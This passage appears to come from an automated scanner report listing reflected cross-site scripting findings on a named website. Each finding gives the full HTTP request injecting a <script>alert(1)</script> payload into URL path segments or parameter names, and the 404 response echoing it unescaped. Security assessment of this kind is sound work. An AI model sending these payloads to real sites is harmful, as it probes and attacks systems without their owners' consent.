User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...b26d8<a>81963b75d98&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.521. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 244d7<script>alert(1)</script>906234ef649 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&244d7<script>alert(1)</script>906234ef649=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&244d7<script>alert(1)</script>906234ef649=1 was not found on this server.</p>
...[SNIP]...

2.522. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 91464<a>929e567bcf5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=291464<a>929e567bcf5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=291464<a>929e567bcf5 was not found on this server.</p>
...[SNIP]...

2.523. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d706<script>alert(1)</script>b810f66498c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication9d706<script>alert(1)</script>b810f66498c/broadband/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication9d706<script>alert(1)</script>b810f66498c/broadband/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.524. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload daae1<script>alert(1)</script>0181b450c29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbanddaae1<script>alert(1)</script>0181b450c29/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbanddaae1<script>alert(1)</script>0181b450c29/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.525. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87f1e<script>alert(1)</script>e630a6a25c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes87f1e<script>alert(1)</script>e630a6a25c5/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes87f1e<script>alert(1)</script>e630a6a25c5/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.526. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c73d<script>alert(1)</script>424f0b105f3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos3c73d<script>alert(1)</script>424f0b105f3/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos3c73d<script>alert(1)</script>424f0b105f3/images/review/ was not found on this server.</p>
...[SNIP]...

2.527. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b3d13<script>alert(1)</script>7dec8c1c2b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesb3d13<script>alert(1)</script>7dec8c1c2b5/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesb3d13<script>alert(1)</script>7dec8c1c2b5/review/ was not found on this server.</p>
...[SNIP]...

2.528. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f85ec<script>alert(1)</script>f99135e95aa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/reviewf85ec<script>alert(1)</script>f99135e95aa/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/reviewf85ec<script>alert(1)</script>f99135e95aa/ was not found on this server.</p>
...[SNIP]...

2.529. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a389e<script>alert(1)</script>8dfabc65741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/?a389e<script>alert(1)</script>8dfabc65741=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/?a389e<script>alert(1)</script>8dfabc65741=1 was not found on this server.</p>
...[SNIP]...

2.530. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 822ab<script>alert(1)</script>6034ad9619d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication822ab<script>alert(1)</script>6034ad9619d/broadband/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication822ab<script>alert(1)</script>6034ad9619d/broadband/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.531. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24c3e<script>alert(1)</script>7a07d79cd48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband24c3e<script>alert(1)</script>7a07d79cd48/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband24c3e<script>alert(1)</script>7a07d79cd48/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.532. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d9ea7<script>alert(1)</script>a92593a8a3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themesd9ea7<script>alert(1)</script>a92593a8a3b/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themesd9ea7<script>alert(1)</script>a92593a8a3b/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.533. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d71b<script>alert(1)</script>56643f9d9dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos7d71b<script>alert(1)</script>56643f9d9dd/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos7d71b<script>alert(1)</script>56643f9d9dd/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.534. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9a7e<script>alert(1)</script>c7d2d428d98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesd9a7e<script>alert(1)</script>c7d2d428d98/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesd9a7e<script>alert(1)</script>c7d2d428d98/review/0.gif was not found on this server.</p>
...[SNIP]...

2.535. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 96336<script>alert(1)</script>28eb8aac899 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review96336<script>alert(1)</script>28eb8aac899/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review96336<script>alert(1)</script>28eb8aac899/0.gif was not found on this server.</p>
...[SNIP]...

2.536. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b2c8a<script>alert(1)</script>804057f0e7e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/0.gifb2c8a<script>alert(1)</script>804057f0e7e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/0.gifb2c8a<script>alert(1)</script>804057f0e7e was not found on this server.</p>
...[SNIP]...

2.537. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9b501<script>alert(1)</script>ba989198838 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/0.gif?9b501<script>alert(1)</script>ba989198838=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/0.gif?9b501<script>alert(1)</script>ba989198838=1 was not found on this server.</p>
...[SNIP]...

2.538. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d634<script>alert(1)</script>ac1091bb527 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication7d634<script>alert(1)</script>ac1091bb527/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7d634<script>alert(1)</script>ac1091bb527/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.539. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e791<script>alert(1)</script>1cbf0215c78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband3e791<script>alert(1)</script>1cbf0215c78/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
